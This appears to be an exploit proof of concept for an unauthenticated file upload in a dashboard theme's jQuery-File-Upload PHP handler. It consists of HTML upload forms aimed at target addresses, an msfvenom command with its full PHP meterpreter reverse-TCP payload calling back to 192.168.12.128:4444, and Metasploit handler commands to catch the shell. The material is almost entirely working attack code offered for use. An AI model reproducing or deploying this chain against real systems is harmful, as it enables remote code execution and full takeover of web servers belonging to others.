-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" en>
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
#Change the above with the target uri
-->
<html>
<body>
<form method="post" action="http://192.168.101.190/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" en>
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.12.128 lport=4444 -f raw
#output:
<?php /**/ error_reporting(0); $ip = '192.168.12.128'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.12.128
set lport 4444
run